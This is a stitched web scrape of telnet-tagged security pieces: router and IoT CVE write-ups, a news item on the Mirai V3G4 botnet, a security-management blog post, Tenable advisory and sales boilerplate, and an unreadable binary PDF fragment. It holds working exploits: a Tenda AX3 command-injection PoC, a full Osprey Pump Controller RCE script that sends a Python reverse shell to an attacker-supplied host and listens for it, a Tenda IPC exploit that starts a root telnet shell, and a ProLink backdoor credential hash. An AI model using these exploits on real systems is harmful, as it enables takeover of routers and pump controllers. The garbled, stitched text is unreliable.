Tenda AX3 V16.03.12.11 was discovered to contain a command injection vulnerability via the lanip parameter at /goform/AdvSetLanip.

**Tenda AX3 V16.03.12.11 command injection vulnerability****Firmware information**

*   Manufacturer's address：https://www.tenda.com.cn/
    
*   Firmware download address ： https://www.tenda.com.cn/download/detail-3476.html
    

**Affected version**

**Vulnerability details**

In /goform/AdvSetLanip, /goform/telnet, You can set lanip in AdvSetLanip. In the telnet function, the program will get the value of lanip and pass it into the system without any filtering. If the user passes in a malicious command, it will cause a command injection vulnerability.

**Poc**

import requests

url \= "http://192.168.0.1/goform/AdvSetLanip"

lanIp \= ';reboot;'

r \= requests.post(url, data\={'lanIp': lanIp})
print(r.content)

url \= "http://192.168.0.1/goform/telnet"

r \= requests.post(url, data\={'lanIp': lanIp})
print(r.content)

You can see that the router restarts, forming a command injection vulnerability, and finally you can write exp to get root shell

CVE-2023-27240: CVE/readme.md at main · yjzy00001/CVE

Osprey Pump Controller version 1.0.1 unauthenticated remote code execution exploit.

    #!/usr/bin/env python### Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution Exploit### Vendor: ProPump and Controls, Inc.# Product web page: https://www.propumpservice.com | https://www.pumpstationparts.com# Affected version: Software Build ID 20211018, Production 10/18/2021#                   Mirage App: MirageAppManager, Release [1.0.1]#                   Mirage Model 1, RetroBoard II### Summary: Providing pumping systems and automated controls for# golf courses and turf irrigation, municipal water and sewer,# biogas, agricultural, and industrial markets. Osprey: door-mounted,# irrigation and landscape pump controller.## Technology hasn't changed dramatically on pump and electric motors# in the last 30 years. Pump station controls are a different story.# More than ever before, customers expect the smooth and efficient# operation of VFD control. Communications—monitoring, remote control,# and interfacing with irrigation computer programs—have become common# requirements. Fast and reliable accessibility through cell phones# has been a game changer.## ProPump & Controls can handle any of your retrofit needs, from upgrading# an older relay logic system to a powerful modern PLC controller, to# converting your fixed speed or first generation VFD control system to# the latest control platform with communications capabilities.## We use a variety of solutions, from MCI-Flowtronex and Watertronics# package panels to sophisticated SCADA systems capable of controlling# and monitoring networks of hundreds of pump stations, valves, tanks,# deep wells, or remote flow meters.## User friendly system navigation allows quick and easy access to all# critical pump station information with no password protection unless# requested by the customer. Easy to understand control terminology allows# any qualified pump technician the ability to make basic changes without# support. Similar control and navigation platform compared to one of the# most recognized golf pump station control systems for the last twenty# years make it familiar to established golf service groups nationwide.# Reliable push button navigation and LCD information screen allows the# use of all existing control panel door switches to eliminate the common# problems associated with touchscreens.## Global system configuration possibilities allow it to be adapted to# virtually any PLC or relay logic controlled pump stations being used in# the industrial, municipal, agricultural and golf markets that operate# variable or fixed speed. On board Wi-Fi and available cellular modem# option allows complete remote access.## Desc: The controller suffers from an unauthenticated command injection# vulnerability that allows system access with www-data permissions.## ----------------------------------------------------------------------# Triggering command injection...# Trying vector: /DataLogView.php# Operator...?# You got a call from 192.168.3.180:54508# www-data@OspreyController:/var/www/html$ id;pwd# uid=33(www-data) gid=33(www-data) groups=33(www-data)# /var/www/html# www-data@OspreyController:/var/www/html$ exit# Zya!# ----------------------------------------------------------------------## Tested on: Apache/2.4.25 (Raspbian)#            Raspbian GNU/Linux 9 (stretch)#            GNU/Linux 4.14.79-v7+ (armv7l)#            Python 2.7.13 [GCC 6.3.0 20170516]#            GNU gdb (Raspbian 7.12-6) 7.12.0.20161007-git#            PHP 7.0.33-0+deb9u1 (Zend Engine v3.0.0 with Zend OPcache v7.0.33)### Vulnerability discovered by Gjoko 'LiquidWorm' Krstic# Macedonian Information Security Research and Development Laboratory# Zero Science Lab - https://www.zeroscience.mk - @zeroscience### Advisory ID: ZSL-2023-5754# Advisory URL: https://www.zeroscience.mk/en/vulnerabilities/ZSL-2023-5754.php### 05.01.2023##                   o    o#                  O    O#                   o    o#                    o    o#_____________________\  /#                      ||#                      ||#                      ||from  time  import   sleepimport pygame.midi   #---#import subprocess    #---#import threading    #-----#import telnetlib    #-----#import requests    #-------#import socket    #-----------#import pygame    #-----------#import random    #-----------#import sys     #---------------#import re     #-----------------####### #      #-----------------#class Pump__it__up:    def __init__(self):        self.sound=False        self.param="eventFileSelected"        self.vector=["/DataLogView.php?"+self.param,                     "/AlarmsView.php?"+self.param,                     "/EventsView.php?"+self.param,                     "/index.php"] # POST        self.payload=None        self.sagent="Tic"        self.rhost=None        self.lhost=None        self.lport=None    def propo(self):        if len(sys.argv)!=4:            self.kako()        else:            self.presh()            self.rhost=sys.argv[1]            self.lhost=sys.argv[2]            self.lport=int(sys.argv[3])            if not "http" in self.rhost:                self.rhost="http://{}".format(self.rhost)    def kako(self):        self.pumpaj()        print("Ovakoj: python {} [RHOST:RPORT] [LHOST] [LPORT]".format(sys.argv[0]))        exit(0)    def pumpaj(self):        titl="""                 .-.                 |  \\                 | / \\             ,___| |  \\            / ___( )   L           '-`   | |   |                 | |   F                 | |  /                 | |                 | |             ____|_|____            [___________]      ,,,,,/,,,,,,,,,,,,,\\,,,,,o-------------------------------------o Osprey Pump Controller RCE Rev Shel_                v1.0j          Ref: ZSL-2023-5754            by lqwrm, 2023o-------------------------------------o        """        print(titl)    def injekcija(self):        self.headers={"Accept":"*/*",                      "Connection":"close",                      "User-Agent":self.sagent,                      "Cache-Control":"max-age=0",                       "Accept-Encoding":"gzip,deflate",                      "Accept-Language":"en-US,en;q=0.9"}            self.payload =";"######################################################"        self.payload+="/usr/bin/python%20-c%20%27import%20socket,subprocess,os;"        self.payload+="s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.con"        self.payload+="nect((%22"+self.lhost+"%22,"+str(self.lport)+"));os.dup2"        self.payload+="(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),"        self.payload+="2);import%20pty;%20pty.spawn(%22/bin/bash%22)%27"#######"                print("Triggering command injection...")                for url in self.vector:            if url=="/index.php":                print("Trying vector:",url)                import urllib.parse                self.headers["Content-Type"]="application/x-www-form-urlencoded"                self.postdata={"userName":urllib.parse.unquote(self.payload),                               "pseudonym":"251"}                r=requests.post(self.rhost+url,headers=self.headers,data=self.postdata)                if r.status_code == 200:                    break            else:                print("Trying vector:",url[:-18])                r=requests.get(self.rhost+url+"="+self.payload,headers=self.headers)                print("Code:",r.status_code)                if r.status_code == 200:                    print('Access Granted!')                    break    def netcat(self):        import nclib        server = nclib.TCPServer(("0.0.0.0",int(self.lport)))        print("Operator...?")        server.sock.settimeout(7)        for client in server:            print("You got a call from %s:%d" % client.peer)            command=""            while command!="exit":                if len(command)>0:                    if command in client.readln().decode("utf-8").strip(" "):                        pass                data = client.read_until('$')                print(data.decode("utf-8"), end="")                command = input(" ")                client.writeln(command)            print("Zya!")            exit(1)    def rasplet(self):        if self.sound:            konac1=threading.Thread(name="Pump_Up_The_Jam_1",target=self.entertain)            konac1.start()        konac2=threading.Thread(name="Pump_Up_The_Jam_2",target=self.netcat)        konac2.start()        self.injekcija()    def presh(self):        titl2="""  _______________________________________ /                                       \\|  {###################################}  ||  {##     Osprey Pump Controller    ##}  ||  {##            RCE 0day           ##}  ||  {##                               ##}  ||  {##         ZSL-2023-5754         ##}  ||  {###################################}  ||                                         ||               80  90  100               ||            70     ^      120            ||        60 *      /|\       * 140        ||    55             |              160    ||                   |                     ||                   |                     ||   (O)            (+)              (O)   | \_______________________________________/        """        print(titl2)    def entertain(self):                pygame.midi.init()        midi_output=pygame.midi.Output(0)            notes=[            (74,251),(86,251),(76,251),(88,251),(84,251),(72,251),(69,251),(81,251),            (83,251),(71,251),(67,251),(79,251),(74,251),(62,251),(64,251),(76,251),            (72,251),(60,251),(69,251),(57,251),(59,251),(71,251),(55,251),(67,251),            (62,251),(50,251),(64,251),(52,251),(48,251),(60,251),(57,251),(45,251),            (47,251),(59,251),(45,251),(57,251),(56,251),(44,251),(43,251),(55,251),            (67,251),(43,251),(55,251),(79,251),(71,251),(74,251),(55,251),(59,251),            (62,251),(63,251),(48,251),(64,251),(72,251),(52,251),(55,251),(60,251),            (64,251),(43,251),(55,251),(72,251),(60,251),(64,251),(55,251),(58,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(52,251),(40,251),(72,251),            (76,251),(84,251),(55,251),(60,251),(77,251),(86,251),(74,251),(75,251),            (78,251),(87,251),(79,251),(43,251),(76,251),(88,251),(72,251),(84,251),            (76,251),(60,251),(55,251),(86,251),(74,251),(77,251),(52,251),(88,251),            (79,251),(76,251),(43,251),(83,251),(74,251),(71,251),(86,251),(74,251),            (77,251),(59,251),(53,251),(55,251),(76,251),(84,251),(48,251),(72,251),            (52,251),(55,251),(60,251),(52,251),(55,251),(60,251),(55,251),(59,251),            (62,251),(63,251),(64,251),(48,251),(72,251),(60,251),(52,251),(55,251),            (64,251),(43,251),(55,251),(72,251),(64,251),(55,251),(58,251),(60,251),            (72,251),(41,251),(53,251),(60,251),(57,251),(40,251),(52,251),(72,251),            (51,251),(81,251),(39,251),(69,251),(67,251),(79,251),(72,251),(38,251),            (50,251),(78,251),(66,251),(72,251),(69,251),(81,251),(50,251),(72,251),            (54,251),(57,251),(84,251),(60,251),(76,251),(88,251),(50,251),(74,251),            (86,251),(84,251),(54,251),(57,251),(60,251),(72,251),(69,251),(81,251)]        channel=0        velocity=124        for note, duration in notes:            midi_output.note_on(note, velocity, channel)            duration=59            pygame.time.wait(random.randint(100,301))            pygame.time.wait(duration)            midi_output.note_off(note, velocity, channel)            del midi_output        pygame.midi.quit()    def main(self):        self.propo()        self.rasplet()        exit(1)if __name__=='__main__':    Pump__it__up().main()

Osprey Pump Controller 1.0.1 Unauthenticated Remote Code Execution

Certain Tenda products are vulnerable to command injection. This affects Tenda CP7 Tenda CP7<=V11.10.00.2211041403 and Tenda CP3 v.10 Tenda CP3 v.10<=V20220906024_2025 and Tenda IT7-PCS Tenda IT7-PCS<=V2209020914 and Tenda IT7-LCS Tenda IT7-LCS<=V2209020914 and Tenda IT7-PRS Tenda IT7-PRS<=V2209020908.

**Information****CVE ID: CVE-2023-23080****Vendor of the products:**

Tenda

**Reported by:**

FeiXincheng(FXC030618@outlook.com) && ShaLetian(ltsha@njupt.edu.cn) from X1cT34m

**Affected products:**

Tenda CP7, Tenda CP3 v.10,Tenda IT7-PCS,Tenda IT7-LCS,Tenda IT7-PRS，Tenda IT7-LRS,Tenda IC7-LRS,Tenda IC7-PRS,Tenda IT6-PCS，Tenda IT6-LCS,Tenda IT6-PRS,Tenda IC6-LRS,Tenda IC6-PRS,Tenda IT6-LRS

**Affected firmware version:**

Tenda CP7<=V11.10.00.2211041403

Tenda CP3 v.10<=V20220906024\_2025

Tenda IT7-PCS<=V2209020914

Tenda IT7-LCS<=V2209020914

Tenda IT7-PRS<=V2209020908

Tenda IT7-LRS<=V2209020908\_0909

Tenda IC7-LRS<=2209020910

Tenda IC7-PRS<=2209020910

Tenda IT6-PCS<=2209020915

Tenda IT6-LCS<=2209020915

Tenda IT6-PRS<=2209020911

Tenda IC6-LRS<=2209020912

Tenda IC6-PRS<=2209020912

Tenda IT6-LRS<=2209020911

**Vendor Homepage:**

https://www.tenda.com.cn/

**Vendor Advisory:**

https://www.tenda.com.cn/product/download/CP7.html

https://www.tenda.com.cn/download/detail-3472.html

https://www.tenda.com.cn/download/detail-3471.html

https://www.tenda.com.cn/download/detail-3470.html

https://www.tenda.com.cn/download/detail-3466.html

https://www.tenda.com.cn/download/detail-3467.html

https://www.tenda.com.cn/download/detail-3463.htmll

https://www.tenda.com.cn/download/detail-3478.html

https://www.tenda.com.cn/download/detail-3469.html

https://www.tenda.com.cn/download/detail-3464.html

https://www.tenda.com.cn/download/detail-3466.html

https://www.tenda.com.cn/download/detail-3461.html

https://www.tenda.com.cn/download/detail-3462.html

https://www.tenda.com.cn/download/detail-3465.html

**Summarize**

Tenda IPC was discovered to contain a command injection vulnerability in port 1300.This vulnerability allows attackers to execute arbitrary commands.

**Vulnerability details**

The vulnerability is in port 1300.

At first, from the startentry enters, and then the sub_11924 function is executed.

In the function sub_11924, we find that we can controll the content, and then we can execute the sub_14404 function.

In the function sub_14404, the content will be passed to sub_16E04.

In the function sub_16E04,we find that dangerous function popen appear. And we can achieve a code excute.

**poc**

for example: python3 exploit.py 192.168.2.106 8888

from time import sleep
import requests
import socket
import sys
import os

if \_\_name\_\_ \== "\_\_main\_\_":
	TARGET\_IP \= sys.argv\[1\]
	SHELL\_PORT \= sys.argv\[2\]

	SHELL\_OPERATION \= "<SYSTEMEX>telnetd -p %s -l /bin/sh &</SYSTEMEX>" % SHELL\_PORT

	print("\\x1b\[01;38;5;214m\[+\] Connect to target ip\\x1b\[0m")
	s \= socket.socket(socket.AF\_INET, socket.SOCK\_STREAM)
	s.connect((TARGET\_IP,1300))
	sleep(0.5)

	print("\[+\] Sending payload to %s ..." % TARGET\_IP)
	s.send(SHELL\_OPERATION.encode())
	
	s.recv(1024)
	sleep(1)
	
	print("\\x1b\[01;38;5;1m\[+\] Successfully connect to Port %s\\x1b\[0m" % SHELL\_PORT)
	os.system("telnet %s %s" % (TARGET\_IP,SHELL\_PORT))
	
	s.close()

**Before attack**

**After attack**

CVE-2023-23080: iot-vul/Tenda/IPC at main · fxc233/iot-vul

Aztech WMB250AC Mesh Routers Firmware Version 016 2020 devices improperly manage sessions, which allows remote attackers to bypass authentication in opportunistic circumstances and execute arbitrary commands with administrator privileges by leveraging an existing web portal login.

**CVE-2022-45600**

CVE URL:

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-45600

Reported by:

TanYeeTat

Product:

Aztech WMB250AC Wireless Mesh Routers

Affected Firmware:

2020 Release (topaz-linux.lzma.img)

Firmware download:

closed source

> Product Manual: https://kylaconnect.com/download-center/

> Vulnerability was reported to Aztech's security team via security@aztech.com on **7th June 2022**, with no response as of 21st February 2023
> 
> *   Kylaconnect Vulnerability Disclosure

**Vulnerability Details**

A Command Injection vulnerability (that leads to Privilege Escalation) exists in multiple webpages (list below), that allows a web-authenticated user to execute arbitrary shell commands on the device as the root user. The root user account could not be accessed in any other conventional methods (e.g., Telnet), and has been locked down by the firmware's configuration. This vulnerability bypasses that configuration and escalates an attacker's privileges to root.

List of affected webpages

*   Line 283 in status_wireless.php
*   Line 54 in config_wps.php
*   Line 81 in assoc_table.php
*   Line 55 in config_macfilter.php
*   Line 54 in config_wps.php

There is a lack of input validation and sanitization in the above list of web pages affecting the processing of a GET parameter,id, which is fed into a shell command that is executed as the root user. Command injection is performed by terminating the preceeding legitimate shell command with a semicolon ;, followed by an arbitrary shell command to inject.

> Snippet of retrieving the GET parameter id
> 
> *   the value of id is stored into interface_id variable

> Further down the PHP codes, the interface_id is fed into multiple exec() calls without validation or sanitization

**Proof of Concept**

The following steps will list how to reproduce this vulnerability

1.  Start the product physically or emulated
2.  Modify the PoC bash script's credentials to authenticate to the web service
3.  Execute the PoC bash script to obtain a root shell on the device

CVE-2022-45600: GitHub - ethancunt/CVE-2022-45600

Despite increased threats, an uncertain economy, and increasing automation, your organization can still thrive.

When the vulnerability in Log4j happened, security teams sought the answer to a seemingly simple question: Am I vulnerable?

Answering that question led to a maelstrom of activity. Security groups requested information from vendors about their level of vulnerability and, in turn, had to respond to their customers about whether they were vulnerable. In many ways, the entire exercise seemed more about legal obligations than making people more secure.

The deluge of information — some of it useful, some of it useless — highlighted the need to rethink how we are doing security in the future.

We're living in a chaotic time. With a possible recession, technology companies trimming their ranks, and businesses pushing further into the cloud and adopting more automation and AI, security teams need to re-evaluate. Do they just follow the traditional playbook without thinking why? Or do they improve what they are doing to make security better?

Here are some focus areas to reduce chaos and increase overall security effectiveness.

**Simplify for Greater Visibility**

Gaining visibility into your applications and infrastructure is essential. Companies expanding their use of the cloud and converting applications to cloud-native infrastructure often see initial growing complexity because of a period of redundancy and hybrid infrastructure.

Pushing beyond that stage provides both cost and security benefits. Limiting the use of third-party tools to capture and analyze data for security teams is important. There's really no reason to, say, pull NetFlow data off the cloud infrastructure, when that same data — and more — is natively available.

Explore your cloud service provider's tools. Major cloud providers will often provide you detailed data, and you can reduce the complexity of the infrastructure needed to analyze that data.

**Pay Attention to Even the "Small" Breaches**

When NASA astronauts start getting emails in French, it's time to investigate.

That's what happened to Gavin early in his security career. Turns out two students in France were using Telnet to get into the NASA server and using it to send email. The incident ended up driving a greater project around making sure NASA had a robust data classification system and better data isolation.

Weird anomalies can be signs of an attack, but they can also drive a security team to better understand their organization's infrastructure. Investigations are time consuming but also often worthwhile, so even the small stuff should be investigated.

**Threat Intelligence Can Help**

Usually, a security team's most precious commodity is time. The old method of analyzing every IT project (even as they are changing) and looking for security issues is untenable.

Threat intelligence can help cut through the noise. By using threat intelligence, your security team can take a priority-based approach to architecture based on real-world attack intelligence. At the same time, they can deprioritize other areas. Threat intelligence can also help refine your playbooks and increase the maturity of your security team.

**Thriving With Automation, Planning for Layoffs**

Security teams are facing other sorts of stress, with most economists expecting a recession. Security teams still need to be able to perform, despite stressors and even in the face of losing some of their headcount.

To focus on the most important aspects of security, even with fewer people, companies need to adopt more automation, machine learning, and artificial intelligence. Every team should be asking how to speed up manual tasks with automation. Automation, correctly applied, can free up staff to be working on the areas.

In the past, security teams have been considered a roadblock — a bump on the way to a company's core business of making money. Most teams have moved past the reflexive need to say no. We're here to make sure that the business is taking educated risks, but at the end of the day, just saying no to everything doesn't help anyone.

As every security manager surveys the horizon, they need to look at how they have traditionally approached problems. And they should consider whether now is time to say yes to something new.

Headwinds Don't Have to Be a Drag on Your Security Effectiveness

Prolink router PRS1841 was discovered to contain hardcoded credentials for its Telnet and FTP services.

    # Exploit Title: Router backdoor - ProLink PRS1841 PLDT Home fiber# Exploit Author: Lawrence Amer @zux0x3a# Vendor Homepage: https://prolink2u.com/product/prs1841/# Firmware : PRS1841 U V2# reference: https://0xsp.com/security%20research%20%20development%20srd/backdoor-discovered-in-pldt-home-fiber-routers/Description========================A silent privileged backdoor account discovered on the Prolink PRS1841 routers; allows attackers to gain command execution privileges to the router OS.The vulnerable account issued by the vendor was identified as "adsl" and "realtek" as the default password; attackers could use this account to access the router remotely/internally using either Telnet or FTP protocol.PoC=============================adsl:$1$$m9g7v7tSyWPyjvelclu6D1:0:0::/tmp:/bin/cli

CVE-2022-46637: ProLink PRS1841 Backdoor Account ≈ Packet Storm

A security misconfiguration vulnerability exists in the Zyxel LTE3316-M604 firmware version V2.00(ABMP.6)C0 due to a factory default misconfiguration intended for testing purposes. A remote attacker could leverage this vulnerability to access an affected device using Telnet.

CVE-2023-22920

A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices.
Observed during the second half of 2022, the new version has been dubbed V3G4 by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor.
"Once the vulnerable devices are compromised, they

IoT Security / Cyber Attack

A new variant of the notorious Mirai botnet has been found leveraging several security vulnerabilities to propagate itself to Linux and IoT devices.

Observed during the second half of 2022, the new version has been dubbed **V3G4** by Palo Alto Networks Unit 42, which identified three different campaigns likely conducted by the same threat actor.

"Once the vulnerable devices are compromised, they will be fully controlled by attackers and become a part of the botnet," Unit 42 researchers said. "The threat actor has the capability to utilize those devices to conduct further attacks, such as distributed denial-of-service (DDoS) attacks."

The attacks primarily single out exposed servers and networking devices running Linux, with the adversary weaponizing as many as 13 flaws that could lead to remote code execution (RCE).

Some of the notable flaws relate to critical flaws in Atlassian Confluence Server and Data Center, DrayTek Vigor routers, Airspan AirSpot, and Geutebruck IP cameras, among others. The oldest flaw in the list is CVE-2012-4869, an RCE bug in FreePBX.

Following a successful compromise, the botnet payload is retrieved from a remote server using the wget and cURL utilities.

The botnet, in addition to checking if it's already running on the infected machine, also takes steps to terminate other competing botnets such as Mozi, Okami, and Yakuza.

V3G4 further packs a set of default or weak login credentials that it uses to carry out brute-force attacks through Telnet/SSH and proliferate to other machines.

It also establishes contact with a command-and-control server to await commands for launching DDoS attacks against targets via UDP, TCP, and HTTP protocols.

"The vulnerabilities mentioned above have less attack complexity than previously observed variants, but they maintain a critical security impact that can lead to remote code execution," the researchers said.

To stave off such attacks, it's recommended that users apply necessary patches and updates as and when they become applicable, and secure the devices with strong passwords.

Found this article interesting? Follow us on Twitter __ and LinkedIn to read more exclusive content we post.

New Mirai Botnet Variant 'V3G4' Exploiting 13 Flaws to Target Linux and IoT Devices

A vulnerability has been identified in SiPass integrated AC5102 (ACC-G2) (All versions < V2.85.44), SiPass integrated ACC-AP (All versions < V2.85.43). Affected devices improperly sanitize user input on the telnet command line interface. This could allow an authenticated user to escalate privileges by injecting arbitrary commands that are executed with root privileges.

%PDF-1.5 %���� 55 0 obj << /Length 2422 /Filter /FlateDecode >> stream xڽZ\]w�H}��У8g��S����qr2;I�gΞd\[;�X���������D�}�MwuUu��\[,��X������e#��T��h�dik�M4�F��a�/���&���d\[��\\���O?4������a�kO�˯�r��l..�{�=��6���rt��3�X�Љ�<�,�>�Ƣ)>�9b��Y��f."�e����<�����׆L2��4a�8&3S�5j'��G����\*c��m��,8h8�:3V�zj�:���fz����T&\\�."�,I�1�I��tS��r�/�Ou�'Rv�Y�q�Ey!�$��|m�L�c�iv��w��MQ.\[��\*�&;I܄4������Q�!�2���S/e�v�̫��bN��2���AfY�d�s�"A,��� spE�(��m��W��E��IƎ\*�X ����-����u��'B�f��ɀ� <��f3s��M~\[�7��O�I�0��ܩ���H.��{�S,�М��p�Ⱥl�puL� �'P�E�adI�E���������$�%�P7�ˣjK���/�oۜ�!s��i���".Ǳ��eف�ن�D�S

CVE-2022-31808

A command injection vulnerability in the firmware_update command, in the device's restricted telnet interface, allows an authenticated attacker to execute arbitrary commands as root.

_All information within TRA advisories is provided “as is”, without warranty of any kind, including the implied warranties of merchantability and fitness for a particular purpose, and with no guarantee of completeness, accuracy, or timeliness. Individuals and organizations are responsible for assessing the impact of any actual or potential security vulnerability._

_Tenable takes product security very seriously. If you believe you have found a vulnerability in one of our products, we ask that you please work with us to quickly resolve it in order to protect customers. Tenable believes in responding quickly to such reports, maintaining communication with researchers, and providing a solution in short order._

_For more details on submitting vulnerability information, please see our Vulnerability Reporting Guidelines page._

_If you have questions or corrections about this advisory, please email \[email protected\]_

Tenable Advisory ID

TRA-2023-1

CVSSv3 Base / Temporal Score

Affected Products

D-Link DWL-2600AP with firmware v4.2.0.17

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

 BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Nessus Professional Free**

FREE FOR 7 DAYS

Nessus® is the most comprehensive vulnerability scanner on the market today.

**NEW - Nessus Expert Now Available**

Nessus Expert adds even more features, including external attack surface scanning, and the ability to add domains and scan cloud infrastructure. **Click here to Try Nessus Expert.**

Fill out the form below to continue with a Nessus Professional Trial.

**Buy Nessus Professional**

Nessus® is the most comprehensive vulnerability scanner on the market today. Nessus Professional will help automate the vulnerability scanning process, save time in your compliance cycles and allow you to engage your IT team.

Buy a multi-year license and save. Add Advanced Support for access to phone, community and chat support 24 hours a day, 365 days a year.

Tenable.io

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy.

Your Tenable.io Vulnerability Management trial also includes Tenable Lumin, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

Tenable.io

BUY

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

65 assets

Choose Your Subscription Option:

**Thank You**

Thank you for your interest in Tenable.io. A representative will be in touch soon.

**Try Tenable.io Web Application Scanning**

Enjoy full access to our latest web application scanning offering designed for modern applications as part of the Tenable.io platform. Safely scan your entire online portfolio for vulnerabilities with a high degree of accuracy without heavy manual effort or disruption to critical web applications. **Sign up now.**

Your Tenable Web Application Scanning trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.cs Cloud Security.

**Buy Tenable.io Web Application Scanning**

Enjoy full access to a modern, cloud-based vulnerability management platform that enables you to see and track all of your assets with unmatched accuracy. **Purchase your annual subscription today.**

**Try Tenable.io Container Security**

Enjoy full access to the only container security offering integrated into a vulnerability management platform. Monitor container images for vulnerabilities, malware and policy violations. Integrate with continuous integration and continuous deployment (CI/CD) systems to support DevOps practices, strengthen security and support enterprise policy compliance.

**Buy Tenable.io Container Security**

Tenable.io Container Security seamlessly and securely enables DevOps processes by providing visibility into the security of container images – including vulnerabilities, malware and policy violations – through integration with the build process.

**Thank You**

Thank you for your interest in the Tenable.io Container Security program. A representative will be in touch soon.

**Try Tenable Lumin**

Visualize and explore your Cyber Exposure, track risk reduction over time and benchmark against your peers with Tenable Lumin.

Your Tenable Lumin trial also includes Tenable.io Vulnerability Management, Tenable.io Web Application Scanning and Tenable.cs Cloud Security.

**Buy Tenable Lumin**

Contact a Sales Representative to see how Lumin can help you gain insight across your entire organization and manage cyber risk.

**Thank You**

Thank you for your interest in Tenable Lumin. A representative will be in touch soon.

**Request a demo of Tenable.sc**

Please fill out this form with your contact information.

A sales representative will contact you shortly to schedule a demo.

_\* Field is required_

**Request a demo of Tenable.ot**

Get the Operational Technology Security You Need.

Reduce the Risk You Don’t.

**Request a demo of Tenable.ad**

Continuously detect and respond to Active Directory attacks. No agents. No privileges.

On-prem and in the cloud.

**Try Tenable.cs**

Enjoy full access to detect and fix cloud infrastructure misconfigurations and view runtime vulnerabilities. Sign up for your free trial now.

Your Tenable.cs Cloud Security trial also includes Tenable.io Vulnerability Management, Tenable Lumin and Tenable.io Web Application Scanning.

**Contact a Sales Rep to Buy Tenable.cs**

Contact a Sales Representative to learn more about Tenable.cs Cloud Security and see how easy it is to onboard your cloud accounts and get visibility into both cloud misconfigurations and vulnerabilities within minutes.

**Thank You**

Thank you for your interest in Tenable.cs. A representative will be in touch soon.

**See  
Tenable One  
In Action**

Exposure management for the modern attack surface.

**See Tenable.asm In Action**

Know the exposure of every asset on any platform.

**Thank You**

Thank you for your interest in Tenable.asm. A representative will be in touch soon.

**Try Nessus Expert Free**

FREE FOR 7 DAYS

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

**Already have Nessus Professional?**  
Upgrade to Nessus Expert free for 7 days.

**Buy Nessus Expert**

Built for the modern attack surface, Nessus Expert enables you to see more and protect your organization from vulnerabilities from IT to the cloud.

Tag

#telnet